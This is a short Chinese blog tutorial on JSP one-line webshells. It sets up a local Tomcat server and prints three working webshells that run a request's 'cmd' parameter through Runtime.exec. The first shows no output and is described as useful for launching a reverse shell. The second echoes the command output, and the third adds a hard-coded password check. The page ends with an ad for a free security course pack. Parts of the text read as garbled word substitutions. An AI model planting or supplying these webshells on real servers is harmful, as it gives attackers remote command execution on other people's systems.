java安全——jsp一句话木马

jsp回显一句话木马

文章目录

• jsp回显一句话木马
  
• 一、搭建web服务
  
• 1. * 1、创建空白maven项目，搭建本地tomcat

  复制代码
  
  
  • 2、引入servlet的pom依靠
    
  
  
• 二、无回显一句话
  
• 三、带回显一句话
  
• 三、有密码带回显一句话
  

---

提示：以下是本篇文章正文内容，下面案例可供参考
一、搭建web服务

1、创建空缺maven项目，搭建当地tomcat

2、引入servlet的pom依靠

二、无回显一句话

1. <%
2.     Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
3. %>

复制代码

http://localhost:8003/index.jsp?cmd=whoami
不会回显执行的结果只能在配景打印一个地点，常用来反弹shell

三、带回显一句话

代码如下（示例）：

1.   <%
2.     Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
3. //    System.out.println(process);
4.     InputStream inputStream = process.getInputStream();
5.     BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
6.     String line;
7.     while ((line = bufferedReader.readLine()) != null){
8.       response.getWriter().println(line);
9.     }
10.   %>

复制代码

---

三、有密码带回显一句话

1.   <%
2.     if ("password".equals(request.getParameter("pass"))){
3.       Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
4. //    System.out.println(process);
5.       InputStream inputStream = process.getInputStream();
6.       BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
7.       String line;
8.       while ((line = bufferedReader.readLine()) != null){
9.         response.getWriter().println(line);
10.       }
11.     }
12.   %>

复制代码

学习计划安排

我一共划分了六个阶段，但并不是说你得学完全部才能上手工作，对于一些初级岗位，学到第三四个阶段就足矣~
这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包，必要的小搭档可以扫描下方CSDN官方互助二维码免费领取哦，无偿分享！！！
假如你对网络安全入门感爱好，那么你必要的话可以
点击这里